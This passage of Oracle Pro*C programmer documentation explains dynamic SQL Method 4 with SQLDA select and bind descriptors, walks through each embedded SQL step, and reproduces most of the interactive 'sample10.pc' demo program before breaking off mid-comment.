For example, if DESCRIBE SELECT LIST finds that the ith select-list item is of type NUMBER, and you want to store the returned value in a C variable declared as float, simply set T[i] to 4 and L[i] to the length of floats on your system.

The library function SQLNumberPrecV6() (previously known as sqlprc()) extracts precision and scale. Normally, it is used after the DESCRIBE SELECT LIST, and its first argument is L[i]. You call SQLNumberPrecV6() using the following syntax:

SQLNumberPrecV6(dvoid *runtime_context, int *length, int *precision, int *scale);

where:

runtime_context is a pointer to the runtime context.
length is a pointer to the packed length value (normally, an element of the L array).
precision and scale return the extracted precision and scale.

When the scale is negative, add its absolute value to the length. For example, a precision of 3 and scale of -2 allow for numbers as large as 99900.

The following example shows how SQLNumberPrecV6() is used to compute maximum display lengths for NUMBER values that will be coerced to STRING:

/* Declare variables for the function call. */
SQLDA *select_des;              /* pointer to select descriptor */
int prec;                       /* precision */
int scal;                       /* scale */
extern void SQLNumberPrecV6();  /* Declare library function. */

/* Extract precision and scale. */
SQLNumberPrecV6(SQL_SINGLE_RCTX, &(select_des->L[i]), &prec, &scal);

/* Allow for maximum size of NUMBER. */
if (prec == 0)
    prec = 38;

/* Allow for possible decimal point and sign. */
select_des->L[i] = prec + 2;

/* Allow for negative scale. */
if (scal < 0)
    select_des->L[i] += -scal;

Notice that the first argument in this function call points to the ith element in the array of lengths, and that all three parameters are addresses.

The SQLNumberPrecV6() function returns zero as the precision and scale values for certain SQL datatypes. The SQLNumberPrecV7() function is similar, having the same argument list, and returning the same values, except in the cases of these SQL datatypes:

For every select-list column (not expression), DESCRIBE SELECT LIST returns a NULL/not NULL indication in the datatype array T of the select descriptor.
If the ith select-list column is constrained to be not NULL, the high-order bit of T[i] is clear; otherwise, it is set. Before using the datatype in an OPEN or FETCH statement, if the NULL/not NULL bit is set, you must clear it. (Never set the bit.)

You can use the library function SQLColumnNullCheck() (previously called sqlnul()) to find out if a column allows NULLs, and to clear the datatype's NULL/not NULL bit. You call SQLColumnNullCheck() using the syntax:

SQLColumnNullCheck(dvoid *context, unsigned short *value_type, unsigned short *type_code, int *null_status);

where:

context is a pointer to the runtime context.
value_type is a pointer to the datatype code that may carry the NULL/not NULL bit (normally, an element of the T array).
type_code returns the datatype code with the NULL/not NULL bit cleared.
null_status returns 1 if the column allows NULLs, 0 otherwise.

The following example shows how to use SQLColumnNullCheck():

/* Declare variables for the function call. */
SQLDA *select_des;                 /* pointer to select descriptor */
unsigned short dtype;              /* datatype without null bit */
int nullok;                        /* 1 = null, 0 = not null */
extern void SQLColumnNullCheck();  /* Declare library function. */

/* Find out whether column is not null. */
SQLColumnNullCheck(SQL_SINGLE_RCTX, (unsigned short *)&(select_des->T[i]),
                   &dtype, &nullok);
if (nullok)
{
    /* Nulls are allowed. */
    ...
    /* Clear the null/not null bit. */
    SQLColumnNullCheck(SQL_SINGLE_RCTX, &(select_des->T[i]),
                       &(select_des->T[i]), &nullok);
}

Notice that the first and second arguments in the second call to the SQLColumnNullCheck() function point to the ith element in the array of datatypes, and that all three parameters are addresses.

Method 4 can be used to process any dynamic SQL statement. In the coming example, a query is processed so you can see how both input and output host variables are handled.

To process the dynamic query, our example program takes the following steps:

Declare a host string in the Declare Section to hold the query text.
Declare select and bind SQLDAs.
Allocate storage space for the select and bind descriptors.
Set the maximum number of select-list items and placeholders that can be DESCRIBEd.
Put the query text in the host string.
PREPARE the query from the host string.
DECLARE a cursor FOR the query.
DESCRIBE the bind variables INTO the bind descriptor.
Reset the number of placeholders to the number actually found by DESCRIBE.
Get values and allocate storage for the bind variables found by DESCRIBE.
OPEN the cursor USING the bind descriptor.
DESCRIBE the select list INTO the select descriptor.
Reset the number of select-list items to the number actually found by DESCRIBE.
Reset the length and datatype of each select-list item for display purposes.
FETCH a row from the database INTO the allocated data buffers pointed to by the select descriptor.
Process the select-list values returned by FETCH.
Deallocate storage space used for the select-list items, placeholders, indicator variables, and descriptors.
CLOSE the cursor.

This section discusses each step in detail. At the end of this chapter is a commented, full-length program illustrating Method 4.

With Method 4, you use the following sequence of embedded SQL statements:

EXEC SQL PREPARE statement_name
    FROM { :host_string | string_literal };
EXEC SQL DECLARE cursor_name CURSOR FOR statement_name;
EXEC SQL DESCRIBE BIND VARIABLES FOR statement_name
    INTO bind_descriptor_name;
EXEC SQL OPEN cursor_name
    [USING DESCRIPTOR bind_descriptor_name];
EXEC SQL DESCRIBE [SELECT LIST FOR] statement_name
    INTO select_descriptor_name;
EXEC SQL FETCH cursor_name
    USING DESCRIPTOR select_descriptor_name;
EXEC SQL CLOSE cursor_name;

Scrollable cursors can also be used with Method 4. The following sequence of embedded SQL statements must be used for scrollable cursors.
EXEC SQL PREPARE statement_name
    FROM { :host_string | string_literal };
EXEC SQL DECLARE cursor_name SCROLL CURSOR FOR statement_name;
EXEC SQL DESCRIBE BIND VARIABLES FOR statement_name
    INTO bind_descriptor_name;
EXEC SQL OPEN cursor_name
    [USING DESCRIPTOR bind_descriptor_name];
EXEC SQL DESCRIBE [SELECT LIST FOR] statement_name
    INTO select_descriptor_name;
EXEC SQL FETCH [FIRST | PRIOR | NEXT | LAST | CURRENT |
    RELATIVE fetch_offset | ABSOLUTE fetch_offset] cursor_name
    USING DESCRIPTOR select_descriptor_name;
EXEC SQL CLOSE cursor_name;

If the number of select-list items in a dynamic query is known, you can omit DESCRIBE SELECT LIST and use the following Method 3 FETCH statement:

EXEC SQL FETCH cursor_name INTO host_variable_list;

Or, if the number of placeholders for bind variables in a dynamic SQL statement is known, you can omit DESCRIBE BIND VARIABLES and use the following Method 3 OPEN statement:

EXEC SQL OPEN cursor_name [USING host_variable_list];

Next, you see how these statements allow your host program to accept and process a dynamic SQL statement using descriptors. To keep the example simple, we:

Confine descriptor arrays to 3 elements
Limit the maximum length of names to 5 characters
Limit the maximum length of values to 10 characters

Your program needs a host variable to store the text of the dynamic SQL statement. The host variable (select_stmt in our example) must be declared as a character string.

...
int emp_number;
VARCHAR emp_name[10];
VARCHAR select_stmt[120];
float bonus;

In our example, instead of hardcoding the SQLDA data structure, you use INCLUDE to copy it into your program, as follows:

#include <sqlda.h>

Then, because the query might contain an unknown number of select-list items or placeholders for bind variables, you declare pointers to select and bind descriptors, as follows:

SQLDA *select_des;
SQLDA *bind_des;

Recall that you allocate storage space for a descriptor with the SQLSQLDAAlloc() library function.
The syntax, using ANSI C notation, is:

SQLDA *SQLSQLDAAlloc(dvoid *context, unsigned int max_vars,
                     unsigned int max_name, unsigned int max_ind_name);

The SQLSQLDAAlloc() function allocates the descriptor structure and the arrays addressed by the pointer variables V, L, T, and I. If max_name is nonzero, arrays addressed by the pointer variables S, M, and C are allocated. If max_ind_name is nonzero, arrays addressed by the pointer variables X, Y, and Z are allocated. No space is allocated if max_name and max_ind_name are zero.

If SQLSQLDAAlloc() succeeds, it returns a pointer to the structure. If SQLSQLDAAlloc() fails, it returns a zero.

In our example, you allocate select and bind descriptors, as follows:

select_des = SQLSQLDAAlloc(SQL_SINGLE_RCTX, 3, (size_t) 5, (size_t) 0);
bind_des = SQLSQLDAAlloc(SQL_SINGLE_RCTX, 3, (size_t) 5, (size_t) 4);

For select descriptors, always set max_ind_name to zero so that no space is allocated for the array addressed by X.

Next, you set the maximum number of select-list items or placeholders that can be DESCRIBEd, as follows:

select_des->N = 3;
bind_des->N = 3;

Figure 15-2 and Figure 15-3 represent the resulting descriptors.

Figure 15-2 Initialized Select Descriptor

Figure 15-3 Initialized Bind Descriptor

Continuing our example, you prompt the user for a SQL statement, then store the input string in select_stmt, as follows:

printf("\n\nEnter SQL statement: ");
gets(select_stmt.arr);
select_stmt.len = strlen(select_stmt.arr);

We assume the user entered the following string:

"SELECT ename, empno, comm FROM emp WHERE comm < :bonus"

PREPARE parses the SQL statement and gives it a name. In our example, PREPARE parses the host string select_stmt and gives it the name sql_stmt, as follows:

EXEC SQL PREPARE sql_stmt FROM :select_stmt;

DECLARE CURSOR defines a cursor by giving it a name and associating it with a specific SELECT statement.
To declare a cursor for static queries, you use the following syntax:

EXEC SQL DECLARE cursor_name CURSOR FOR SELECT ...

To declare a cursor for dynamic queries, the statement name given to the dynamic query by PREPARE is substituted for the static query. In our example, DECLARE CURSOR defines a cursor named emp_cursor and associates it with sql_stmt, as follows:

EXEC SQL DECLARE emp_cursor CURSOR FOR sql_stmt;

DESCRIBE BIND VARIABLES puts descriptions of placeholders into a bind descriptor. In our example, DESCRIBE readies bind_des, as follows:

EXEC SQL DESCRIBE BIND VARIABLES FOR sql_stmt INTO bind_des;

Note that bind_des must not be prefixed with a colon.

The DESCRIBE BIND VARIABLES statement must follow the PREPARE statement but precede the OPEN statement.

Figure 15-4 shows the bind descriptor in our example after the DESCRIBE. Notice that DESCRIBE has set F to the actual number of placeholders found in the processed SQL statement.

Figure 15-4 Bind Descriptor after the DESCRIBE

Next, you must reset the maximum number of placeholders to the number actually found by DESCRIBE, as follows:

bind_des->N = bind_des->F;

Your program must get values for the bind variables found in the SQL statement, and allocate memory for them. How the program gets the values is up to you. For example, they can be hardcoded, read from a file, or entered interactively.

In our example, a value must be assigned to the bind variable that replaces the placeholder bonus in the query WHERE clause. So, you choose to prompt the user for the value, then process it as follows:

for (i = 0; i < bind_des->F; i++)
{
    printf("\nEnter value of bind variable %.*s:\n? ",
           (int) bind_des->C[i], bind_des->S[i]);
    gets(hostval);

    /* Set length of value. */
    bind_des->L[i] = strlen(hostval);

    /* Allocate storage for value and null terminator. */
    bind_des->V[i] = malloc(bind_des->L[i] + 1);

    /* Allocate storage for indicator value. */
    bind_des->I[i] = (unsigned short *) malloc(sizeof(short));

    /* Store value in bind descriptor. */
    strcpy(bind_des->V[i], hostval);

    /* Set value of indicator variable. */
    *(bind_des->I[i]) = 0;    /* or -1 if "null" is the value */

    /* Set datatype to STRING. */
    bind_des->T[i] = 5;
}

Assuming that the user supplied a value of 625 for bonus, Figure 15-5 shows the resulting bind descriptor. Notice that the value is null-terminated.

Figure 15-5 Bind Descriptor after Assigning Values

The OPEN statement used for dynamic queries is like that used for static queries except that the cursor is associated with a bind descriptor. Values determined at run time and stored in buffers addressed by elements of the bind descriptor arrays are used to evaluate the SQL statement. With queries, the values are also used to identify the active set.

In our example, OPEN associates emp_cursor with bind_des, as follows:

EXEC SQL OPEN emp_cursor USING DESCRIPTOR bind_des;

Remember, bind_des must not be prefixed with a colon.

Then, OPEN executes the SQL statement. With queries, OPEN also identifies the active set and positions the cursor at the first row.

If the dynamic SQL statement is a query, the DESCRIBE SELECT LIST statement must follow the OPEN statement but precede the FETCH statement. DESCRIBE SELECT LIST puts descriptions of select-list items in a select descriptor.

In our example, DESCRIBE readies select_des, as follows:

EXEC SQL DESCRIBE SELECT LIST FOR sql_stmt INTO select_des;

Accessing the Oracle data dictionary, DESCRIBE sets the length and datatype of each select-list value.

Figure 15-6 shows the select descriptor in our example after the DESCRIBE. Notice that DESCRIBE has set F to the actual number of items found in the query select list. If the SQL statement is not a query, F is set to zero. Also notice that the NUMBER lengths are not usable yet. For columns defined as NUMBER, you must use the library function SQLNumberPrecV6() to extract precision and scale.
Figure 15-6 Select Descriptor after the DESCRIBE

Next, you must reset the maximum number of select-list items to the number actually found by DESCRIBE, as follows:

select_des->N = select_des->F;

In our example, before FETCHing the select-list values, you allocate storage space for them using the library function malloc(). You also reset some elements in the length and datatype arrays for display purposes.

for (i = 0; i < select_des->F; i++)
{
    /* Clear null bit. */
    SQLColumnNullCheck(SQL_SINGLE_RCTX,
                       (unsigned short *)&(select_des->T[i]),
                       (unsigned short *)&(select_des->T[i]), &nullok);

    /* Reset length if necessary. */
    switch (select_des->T[i])
    {
        case 1:  break;
        case 2:  SQLNumberPrecV6(SQL_SINGLE_RCTX,
                                 (unsigned long *)&(select_des->L[i]),
                                 &prec, &scal);
                 if (prec == 0)
                     prec = 40;
                 select_des->L[i] = prec + 2;
                 if (scal < 0)
                     select_des->L[i] += -scal;
                 break;
        case 8:  select_des->L[i] = 240;
                 break;
        case 11: select_des->L[i] = 18;
                 break;
        case 12: select_des->L[i] = 9;
                 break;
        case 23: break;
        case 24: select_des->L[i] = 240;
                 break;
    }

    /* Allocate storage for select-list value. */
    select_des->V[i] = malloc(select_des->L[i] + 1);

    /* Allocate storage for indicator value. */
    select_des->I[i] = (short *) malloc(sizeof(short *));

    /* Coerce all datatypes except LONG RAW to STRING. */
    if (select_des->T[i] != 24)
        select_des->T[i] = 5;
}

Figure 15-7 shows the resulting select descriptor. Notice that the NUMBER lengths are now usable and that all the datatypes are STRING. The lengths in L[1] and L[2] are 6 and 9 because we increased the DESCRIBEd lengths of 4 and 7 by 2 to allow for a possible sign and decimal point.

Figure 15-7 Select Descriptor before the FETCH

FETCH returns a row from the active set, stores select-list values in the data buffers, and advances the cursor to the next row in the active set. If there are no more rows, FETCH sets sqlca.sqlcode to the "no data found" Oracle error code.
In our example, FETCH returns the values of columns ENAME, EMPNO, and COMM to select_des, as follows:

EXEC SQL FETCH emp_cursor USING DESCRIPTOR select_des;

Figure 15-8 shows the select descriptor in our example after the FETCH. Notice that Oracle has stored the select-list and indicator values in the data buffers addressed by the elements of V and I.

For output buffers of datatype 1, Oracle, using the lengths stored in the L array, left-justifies CHAR or VARCHAR2 data and right-justifies NUMBER data. For output buffers of datatype 5 (STRING), Oracle left-justifies and null-terminates CHAR, VARCHAR2, and NUMBER data.

The value 'MARTIN' was retrieved from a VARCHAR2(10) column in the EMP table. Using the length in L[0], Oracle left-justifies the value in a 10-byte field, filling the buffer.

The value 7654 was retrieved from a NUMBER(4) column and coerced to '7654'. However, the length in L[1] was increased by 2 to allow for a possible sign and decimal point. So, Oracle left-justifies and null-terminates the value in a 6-byte field.

The value 482.50 was retrieved from a NUMBER(7,2) column and coerced to '482.50'. Again, the length in L[2] was increased by 2. So, Oracle left-justifies and null-terminates the value in a 9-byte field.

After the FETCH, your program can process the returned values. In our example, values for columns ENAME, EMPNO, and COMM are processed.

Figure 15-8 Select Descriptor after the FETCH

You use the free() library function to deallocate the storage space allocated by malloc().
The syntax is as follows:

free(char *pointer);

In our example, you deallocate storage space for the values of the select-list items, bind variables, and indicator variables, as follows:

for (i = 0; i < select_des->F; i++)    /* for select descriptor */
{
    free(select_des->V[i]);
    free(select_des->I[i]);
}
for (i = 0; i < bind_des->F; i++)      /* for bind descriptor */
{
    free(bind_des->V[i]);
    free(bind_des->I[i]);
}

You deallocate storage space for the descriptors themselves with the SQLSQLDAFree() library function, using the following syntax:

SQLSQLDAFree(context, descriptor_name);

The descriptor must have been allocated using SQLSQLDAAlloc(). Otherwise, the results are unpredictable.

In our example, you deallocate storage space for the select and bind descriptors as follows:

SQLSQLDAFree(SQL_SINGLE_RCTX, select_des);
SQLSQLDAFree(SQL_SINGLE_RCTX, bind_des);

CLOSE disables the cursor. In our example, CLOSE disables emp_cursor as follows:

EXEC SQL CLOSE emp_cursor;

To use input or output host arrays with Method 4, you must use the optional FOR clause to tell Oracle the size of your host array. You must set descriptor entries for the ith select-list item or bind variable using the syntax

V[i] = array_address;
L[i] = element_size;

where array_address is the address of the host array, and element_size is the size of one array element. Then, you must use a FOR clause in the EXECUTE or FETCH statement (whichever is appropriate) to tell Oracle the number of array elements you want to process.

This procedure is necessary because Oracle has no other way of knowing the size of your host array.

In the complete program example later, three input host arrays are used to INSERT rows into the EMP table. EXECUTE can be used for Data Manipulation Language statements other than queries with Method 4.
#include <stdio.h>
#include <sqlcpr.h>
#include <sqlda.h>
#include <sqlca.h>

#define NAME_SIZE   10
#define INAME_SIZE  10
#define ARRAY_SIZE   5

/* connect string */
char *username = "scott/tiger";

char *sql_stmt =
    "INSERT INTO emp (empno, ename, deptno) VALUES (:e, :n, :d)";
int array_size = ARRAY_SIZE;    /* must have a host variable too */

SQLDA *binda;

char names[ARRAY_SIZE][NAME_SIZE];
int  numbers[ARRAY_SIZE], depts[ARRAY_SIZE];

/* Declare and initialize indicator vars. for empno and deptno columns */
short ind_empno[ARRAY_SIZE] = {0,0,0,0,0};
short ind_dept[ARRAY_SIZE]  = {0,0,0,0,0};

main()
{
    EXEC SQL WHENEVER SQLERROR GOTO sql_error;

    /* Connect */
    EXEC SQL CONNECT :username;
    printf("Connected.\n");

    /* Allocate the descriptors and set the N component.
       This must be done before the DESCRIBE. */
    binda = SQLSQLDAAlloc(SQL_SINGLE_RCTX, 3, NAME_SIZE, INAME_SIZE);
    binda->N = 3;

    /* Prepare and describe the SQL statement. */
    EXEC SQL PREPARE stmt FROM :sql_stmt;
    EXEC SQL DESCRIBE BIND VARIABLES FOR stmt INTO binda;

    /* Initialize the descriptors. */
    binda->V[0] = (char *) numbers;
    binda->L[0] = (long) sizeof (int);
    binda->T[0] = 3;
    binda->I[0] = ind_empno;

    binda->V[1] = (char *) names;
    binda->L[1] = (long) NAME_SIZE;
    binda->T[1] = 1;
    binda->I[1] = (short *)0;

    binda->V[2] = (char *) depts;
    binda->L[2] = (long) sizeof (int);
    binda->T[2] = 3;
    binda->I[2] = ind_dept;

    /* Initialize the data buffers. */
    strcpy(&names[0][0], "ALLISON");
    numbers[0] = 1014;
    depts[0] = 30;

    strcpy(&names[1][0], "TRUSDALE");
    numbers[1] = 1015;
    depts[1] = 30;

    strcpy(&names[2][0], "FRAZIER");
    numbers[2] = 1016;
    depts[2] = 30;

    strcpy(&names[3][0], "CARUSO");
    numbers[3] = 1017;
    ind_dept[3] = -1;   /* set indicator to -1 to insert NULL */
    depts[3] = 30;      /* value in depts[3] is ignored */

    strcpy(&names[4][0], "WESTON");
    numbers[4] = 1018;
    depts[4] = 30;

    /* Do the INSERT. */
    printf("Adding to the Sales force...\n");
    EXEC SQL FOR :array_size
        EXECUTE stmt USING DESCRIPTOR binda;

    /* Print rows-processed count. */
    printf("%d rows inserted.\n\n", sqlca.sqlerrd[2]);

    EXEC SQL COMMIT RELEASE;
    exit(0);

sql_error:
    /* Print Oracle error message. */
    printf("\n%.70s", sqlca.sqlerrm.sqlerrmc);
    EXEC SQL WHENEVER SQLERROR CONTINUE;
    EXEC SQL ROLLBACK RELEASE;
    exit(1);
}

This program shows the basic steps required to use dynamic SQL with Method 4. After connecting to Oracle, the program:

- Allocates memory for the descriptors using SQLSQLDAAlloc()
- Prompts the user for a SQL statement
- PREPAREs the statement
- DECLAREs a cursor
- Checks for any bind variables using DESCRIBE BIND
- OPENs the cursor
- DESCRIBEs any select-list items

If the input SQL statement is a query, the program FETCHes each row of data, then CLOSEs the cursor. This program is available on-line in the demo directory, in the file sample10.pc.

/*******************************************************************
Sample Program 10:  Dynamic SQL Method 4

This program connects you to ORACLE using your username and
password, then prompts you for a SQL statement.  You can enter
any legal SQL statement.  Use regular SQL syntax, not embedded SQL.
Your statement will be processed.  If it is a query, the rows
fetched are displayed.

You can enter multiline statements.  The limit is 1023 characters.
This sample program only processes up to MAX_ITEMS bind variables
and MAX_ITEMS select-list items.  MAX_ITEMS is #defined to be 40.
*******************************************************************/

#include <stdio.h>
#include <string.h>
#include <setjmp.h>
#include <sqlda.h>
#include <stdlib.h>
#include <sqlcpr.h>

/* Maximum number of select-list items or bind variables. */
#define MAX_ITEMS 40

/* Maximum lengths of the _names_ of the
   select-list items or indicator variables.
*/
#define MAX_VNAME_LEN 30
#define MAX_INAME_LEN 30

#ifndef NULL
#define NULL 0
#endif

/* Prototypes */
#if defined(__STDC__)
  void sql_error(void);
  int oracle_connect(void);
  int alloc_descriptors(int, int, int);
  int get_dyn_statement(void);
  void set_bind_variables(void);
  void process_select_list(void);
  void help(void);
#else
  void sql_error(/*_ void _*/);
  int oracle_connect(/*_ void _*/);
  int alloc_descriptors(/*_ int, int, int _*/);
  int get_dyn_statement(/* void _*/);
  void set_bind_variables(/*_ void -*/);
  void process_select_list(/*_ void _*/);
  void help(/*_ void _*/);
#endif

char *dml_commands[] = {"SELECT", "select", "INSERT", "insert",
                        "UPDATE", "update", "DELETE", "delete"};

EXEC SQL INCLUDE sqlda;
EXEC SQL INCLUDE sqlca;

EXEC SQL BEGIN DECLARE SECTION;
    char dyn_statement[1024];
    EXEC SQL VAR dyn_statement IS STRING(1024);
EXEC SQL END DECLARE SECTION;

SQLDA *bind_dp;
SQLDA *select_dp;

/* Define a buffer to hold longjmp state info. */
jmp_buf jmp_continue;

/* A global flag for the error routine. */
int parse_flag = 0;

void main()
{
    int i;

    /* Connect to the database. */
    if (oracle_connect() != 0)
        exit(1);

    /* Allocate memory for the select and bind descriptors. */
    if (alloc_descriptors(MAX_ITEMS, MAX_VNAME_LEN, MAX_INAME_LEN) != 0)
        exit(1);

    /* Process SQL statements. */
    for (;;)
    {
        (void) setjmp(jmp_continue);

        /* Get the statement.  Break on "exit". */
        if (get_dyn_statement() != 0)
            break;

        /* Prepare the statement and declare a cursor. */
        EXEC SQL WHENEVER SQLERROR DO sql_error();

        parse_flag = 1;     /* Set a flag for sql_error(). */
        EXEC SQL PREPARE S FROM :dyn_statement;
        parse_flag = 0;     /* Unset the flag. */

        EXEC SQL DECLARE C CURSOR FOR S;

        /* Set the bind variables for any placeholders in the
           SQL statement. */
        set_bind_variables();

        /* Open the cursor and execute the statement.
         * If the statement is not a query (SELECT), the
         * statement processing is completed after the
         * OPEN.
         */
        EXEC SQL OPEN C USING DESCRIPTOR bind_dp;

        /* Call the function that processes the select-list.
         * If the statement is not a query, this function
         * just returns, doing nothing.
         */
        process_select_list();

        /* Tell user how many rows processed. */
        for (i = 0; i < 8; i++)
        {
            if (strncmp(dyn_statement, dml_commands[i], 6) == 0)
            {
                printf("\n\n%d row%c processed.\n", sqlca.sqlerrd[2],
                       sqlca.sqlerrd[2] == 1 ? '\0' : 's');
                break;
            }
        }
    }  /* end of for(;;) statement-processing loop */

    /* When done, free the memory allocated for
       pointers in the bind and select descriptors. */
    for (i = 0; i < MAX_ITEMS; i++)
    {
        if (bind_dp->V[i] != (char *) 0)
            free(bind_dp->V[i]);
        free(bind_dp->I[i]);    /* MAX_ITEMS were allocated. */
        if (select_dp->V[i] != (char *) 0)
            free(select_dp->V[i]);
        free(select_dp->I[i]);  /* MAX_ITEMS were allocated. */
    }

    /* Free space used by the descriptors themselves. */
    SQLSQLDAFree( SQL_SINGLE_RCTX, bind_dp);
    SQLSQLDAFree( SQL_SINGLE_RCTX, select_dp);

    EXEC SQL WHENEVER SQLERROR CONTINUE;

    /* Close the cursor. */
    EXEC SQL CLOSE C;

    EXEC SQL COMMIT WORK RELEASE;
    puts("\nHave a good day!\n");

    EXEC SQL WHENEVER SQLERROR DO sql_error();
    return;
}

int oracle_connect()
{
    EXEC SQL BEGIN DECLARE SECTION;
        VARCHAR username[128];
        VARCHAR password[32];
    EXEC SQL END DECLARE SECTION;

    printf("\nusername: ");
    fgets((char *) username.arr, sizeof username.arr, stdin);
    username.arr[strlen((char *) username.arr) - 1] = '\0';
    username.len = (unsigned short)strlen((char *) username.arr);

    printf("password: ");
    fgets((char *) password.arr, sizeof password.arr, stdin);
    password.arr[strlen((char *) password.arr) - 1] = '\0';
    password.len = (unsigned short)strlen((char *) password.arr);

    EXEC SQL WHENEVER SQLERROR GOTO connect_error;

    EXEC SQL CONNECT :username IDENTIFIED BY :password;

    printf("\nConnected to ORACLE as user %s.\n", username.arr);
    return 0;

connect_error:
    fprintf(stderr, "Cannot connect to ORACLE as user %s\n", username.arr);
    return -1;
}

/*
 * Allocate the BIND and SELECT descriptors using SQLSQLDAAlloc().
 * Also allocate the pointers to indicator variables
 * in each descriptor.  The pointers to the actual bind
 * variables and the select-list items are realloc'ed in
 * the set_bind_variables() or process_select_list()
 * routines.  This routine allocates 1 byte for select_dp->V[i]
 * and bind_dp->V[i], so the realloc will work correctly.
 */
alloc_descriptors(size, max_vname_len, max_iname_len)
int size;
int max_vname_len;
int max_iname_len;
{
    int i;

    /*
     * The first SQLSQLDAAlloc parameter is the runtime context.
     * The second parameter determines the maximum number of
     * array elements in each variable in the descriptor.  In
     * other words, it determines the maximum number of bind
     * variables or select-list items in the SQL statement.
     *
     * The third parameter determines the maximum length of
     * strings used to hold the names of select-list items
     * or placeholders.  The maximum length of column
     * names in ORACLE is 30, but you can allocate more or less
     * as needed.
     *
     * The fourth parameter determines the maximum length of
     * strings used to hold the names of any indicator
     * variables.  To follow ORACLE standards, the maximum
     * length of these should be 30.  But, you can allocate
     * more or less as needed.
     */
    if ((bind_dp =
        SQLSQLDAAlloc(SQL_SINGLE_RCTX, size,
                      max_vname_len, max_iname_len)) == (SQLDA *) 0)
    {
        fprintf(stderr, "Cannot allocate memory for bind descriptor.");
        return -1;  /* Have to exit in this case. */
    }

    if ((select_dp =
        SQLSQLDAAlloc (SQL_SINGLE_RCTX, size,
                       max_vname_len, max_iname_len)) == (SQLDA *) 0)
    {
        fprintf(stderr, "Cannot allocate memory for select descriptor.");
        return -1;
    }
    select_dp->N = MAX_ITEMS;

    /* Allocate the pointers to the indicator variables, and the
       actual data. */
    for (i = 0; i < MAX_ITEMS; i++) {
        bind_dp->I[i] = (short *) malloc(sizeof (short));
        select_dp->I[i] = (short *) malloc(sizeof(short));
        bind_dp->V[i] = (char *) malloc(1);
        select_dp->V[i] = (char *) malloc(1);
    }

    return 0;
}

int get_dyn_statement()
{
    char *cp, linebuf[256];
    int iter, plsql;

    for (plsql = 0, iter = 1; ;)
    {
        if (iter == 1)
        {
            printf("\nSQL> ");
            dyn_statement[0] = '\0';
        }

        fgets(linebuf, sizeof linebuf, stdin);

        cp = strrchr(linebuf, '\n');
        if (cp && cp != linebuf)
            *cp = ' ';
        else if (cp == linebuf)
            continue;

        if ((strncmp(linebuf, "EXIT", 4) == 0) ||
            (strncmp(linebuf, "exit", 4) == 0))
        {
            return -1;
        }
        else if (linebuf[0] == '?' ||
            (strncmp(linebuf, "HELP", 4) == 0) ||
            (strncmp(linebuf, "help", 4) == 0))
        {
            help();
            iter = 1;
            continue;
        }

        if (strstr(linebuf, "BEGIN") ||
            (strstr(linebuf, "begin")))
        {
            plsql = 1;
        }

        strcat(dyn_statement, linebuf);

        if ((plsql && (cp = strrchr(dyn_statement, '/'))) ||
            (!plsql && (cp = strrchr(dyn_statement, ';'))))
        {
            *cp = '\0';
            break;
        }
        else
        {
            iter++;
            printf("%3d ", iter);
        }
    }
    return 0;
}

void set_bind_variables()
{
    int i, n;
    char bind_var[64];

    /* Describe any bind variables (input host variables) */
    EXEC SQL WHENEVER SQLERROR DO sql_error();

    bind_dp->N = MAX_ITEMS;  /* Initialize count of array elements. */
    EXEC SQL DESCRIBE BIND VARIABLES FOR S INTO bind_dp;

    /* If F is negative, there were more bind variables
       than originally allocated by SQLSQLDAAlloc(). */
    if (bind_dp->F < 0)
    {
        printf ("\nToo many bind variables (%d), maximum is %d\n.",
                -bind_dp->F, MAX_ITEMS);
        return;
    }

    /* Set the maximum number of array elements in the
       descriptor to the number found. */
    bind_dp->N = bind_dp->F;

    /* Get the value of each bind variable as a
     * character string.
     *
     * C[i] contains the length of the bind variable
     *      name used in the SQL statement.
     * S[i] contains the actual name of the bind variable
     *      used in the SQL statement.
     *
     * L[i] will contain the length of the data value
     *      entered.
     *
     * V[i] will contain the address of the data value
     *      entered.
     *
     * T[i] is always set to 1 because in this sample program
     *      data values for all bind variables are entered
     *      as character strings.
     *      ORACLE converts to the table value from CHAR.
     *
     * I[i] will point to the indicator value, which is
     *      set to -1 when the bind variable value is "null".
     */
    for (i = 0; i < bind_dp->F; i++)
    {
        printf ("\nEnter value for bind variable %.*s: ",
                (int)bind_dp->C[i], bind_dp->S[i]);
        fgets(bind_var, sizeof bind_var, stdin);

        /* Get length and remove the new line character. */
        n = strlen(bind_var) - 1;

        /* Set it in the descriptor. */
        bind_dp->L[i] = n;

        /* (re-)allocate the buffer for the value.
           SQLSQLDAAlloc() reserves a pointer location for
           V[i] but does not allocate the full space for
           the pointer. */
        bind_dp->V[i] = (char *) realloc(bind_dp->V[i],
                                         (bind_dp->L[i] + 1));

        /* And copy it in. */
        strncpy(bind_dp->V[i], bind_var, n);

        /* Set the indicator variable's value. */
        if ((strncmp(bind_dp->V[i], "NULL", 4) == 0) ||
            (strncmp(bind_dp->V[i], "null", 4) == 0))
            *bind_dp->I[i] = -1;
        else
            *bind_dp->I[i] = 0;

        /* Set the bind datatype to 1 for CHAR. */
        bind_dp->T[i] = 1;
    }
    return;
}

void process_select_list()
{
    int i, null_ok, precision, scale;

    if ((strncmp(dyn_statement, "SELECT", 6) != 0) &&
        (strncmp(dyn_statement, "select", 6) != 0))
    {
        select_dp->F = 0;
        return;
    }

    /* If the SQL statement is a SELECT, describe the
       select-list items.  The DESCRIBE function returns
       their names, datatypes, lengths (including precision
       and scale), and NULL/NOT NULL statuses. */
    select_dp->N = MAX_ITEMS;
    EXEC SQL DESCRIBE SELECT LIST FOR S INTO select_dp;

    /* If F is negative, there were more select-list
       items than originally allocated by SQLSQLDAAlloc(). */
    if (select_dp->F < 0)
    {
        printf ("\nToo many select-list items (%d), maximum is %d\n",
                -(select_dp->F), MAX_ITEMS);
        return;
    }

    /* Set the maximum number of array elements in the
       descriptor to the number found. */
    select_dp->N = select_dp->F;

    /* Allocate storage for each select-list item.

       SQLNumberPrecV6() is used to extract precision and scale
       from the length (select_dp->L[i]).

       sqlcolumnNullCheck() is used to reset the high-order bit
       of the datatype and to check whether the column is
       NOT NULL.

       CHAR datatypes have length, but zero precision and scale.
       The length is defined at CREATE time.

       NUMBER datatypes have precision and scale only if defined
       at CREATE time.  If the column definition was just NUMBER,
       the precision and scale are zero, and you must allocate
       the required maximum length.

       DATE datatypes return a length of 7 if the default format
       is used.  This should be increased to 9 to store the
       actual date character string.  If you use the TO_CHAR
       function, the maximum length could be 75, but will
       probably be less (you can see the effects of this in
       SQL*Plus).

       ROWID datatype always returns a fixed length of 18 if
       coerced to CHAR.

       LONG and LONG RAW datatypes return a length of 0 (zero),
